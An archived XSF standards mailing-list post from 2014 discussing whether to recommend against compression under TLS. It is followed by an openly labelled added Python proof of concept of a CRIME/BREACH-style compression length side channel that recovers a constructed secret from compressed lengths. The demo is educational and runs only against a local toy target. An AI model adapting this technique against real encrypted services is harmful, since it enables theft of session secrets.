[Standards] XSF recommendation for TLS and compression

Peter Saint-Andre - &yet peter at andyet.net
Thu Nov 13 01:13:41 UTC 2014

On 11/12/14, 6:55 AM, Dave Cridland wrote:
> On 12 November 2014 13:49, Kevin Smith <kevin.smith at isode.com> wrote:
>> I’ve been asked if the XSF can issue a recommendation re: the use of
>> compression and TLS. Ignoring for a moment what a vehicle for
>> issuing such a recommendation might be, what would we recommend?
>
> It's not clear to me we should be making an explicit recommendation -
> after all the closest we can reasonably say to a definitive
> recommendation is "you probably ought to think about whether you really
> need compression".
>
> The subject of updating XEP-0138 to discuss the impact of
> compression-based attacks on encryption, though, has come up before.
>
>> My understanding is that we would recommend that compression is not
>> used where it’s not necessary.
>> Can it ever sensibly be used?
>> If you had to choose one, which would it be?
>
> I think the XSF should just describe the possible attacks, and any
> mitigations.

That at least is a good first step. We might want to do more afterward, 
though (depending on how serious we think the attacks are).


Peter Saint-Andre
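The compression-based attack on encryption that the thread refers to (the CRIME/BREACH family of length side channels) is easy to show in a few dozen lines. The following is an added example, not part of this message and not XSF or XEP-0138 text: it assumes a constructed stanza in which a secret identifier and attacker-influenced body text pass through one zlib context before encryption, which is the situation stream compression (XEP-0138) under TLS creates. The secret, the stanza shape, the guess alphabet, the assumption that zlib emits a fixed-Huffman block for input this short, and the padding sweep used to get bit-level resolution are all assumptions made for the demonstration.

```python
"""Compression length side channel (CRIME/BREACH style) on a TLS-like stream.

Added example, not taken from the XSF thread or any XEP. The stanza shape,
the secret and the attacker's injection point are constructed for the demo.
"""
import string
import zlib

# Constructed secret: a session-style identifier the attacker wants to learn.
SECRET = "sess-7k3q9zv2"
# Assumed character set of the secret (attacker's guess alphabet).
ALPHABET = string.ascii_lowercase + string.digits + "-"


def build_stream(secret: str, injected: bytes) -> bytes:
    """Constructed stanza: the secret and attacker-controlled bytes share one
    compression context, which is the precondition for the attack."""
    head = f"<message id='{secret}'><body>".encode()
    return head + injected + b"</body></message>"


def wire_length(plaintext: bytes, compress: bool) -> int:
    """Length an on-path observer sees. TLS hides content but not length; with
    zlib stream compression the length depends on the content."""
    return len(zlib.compress(plaintext, 9)) if compress else len(plaintext)


def bit_cost(secret: str, guess: bytes, compress: bool) -> int:
    """Byte-granular lengths can hide a one-byte saving when it falls inside
    the partially filled final byte. Sweeping 0..7 incompressible padding
    bytes (distinct non-ASCII values, each 9 bits in deflate's fixed Huffman
    table, an assumption that holds for this short input) and summing the
    observed lengths gives a figure that moves one-for-one with the deflate
    bit count, which is the resolution the attack needs."""
    total = 0
    for k in range(8):
        pad = bytes(range(0xF0, 0xF0 + k))
        total += wire_length(build_stream(secret, guess + pad), compress)
    return total


def recover(secret: str, compress: bool = True) -> str:
    """Recover the secret one character at a time. The attacker prefixes the
    guess with the known format text "id='" so it can extend the back-
    reference to the real identifier: a correct character lengthens the
    match, a wrong one costs an extra literal. Stops when no single candidate
    stands out (end of the secret, or no leak at all)."""
    known = ""
    while True:
        costs = {c: bit_cost(secret, f"id='{known}{c}".encode(), compress)
                 for c in ALPHABET}
        best = min(costs.values())
        winners = [c for c, v in costs.items() if v == best]
        if len(winners) != 1:
            return known
        known += winners[0]


if __name__ == "__main__":
    print("with compression:   ", repr(recover(SECRET, compress=True)))
    print("without compression:", repr(recover(SECRET, compress=False)))
```

With compression on, the observer recovers the whole identifier from lengths alone; with compression off, every candidate yields the same length and the loop returns an empty string, which is the concrete content of the "do not compress where it is not necessary" position in the quoted text. The padding sweep is one way to get past byte alignment; the real attacks used comparable tricks (CRIME's "two tries" is the best-known).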
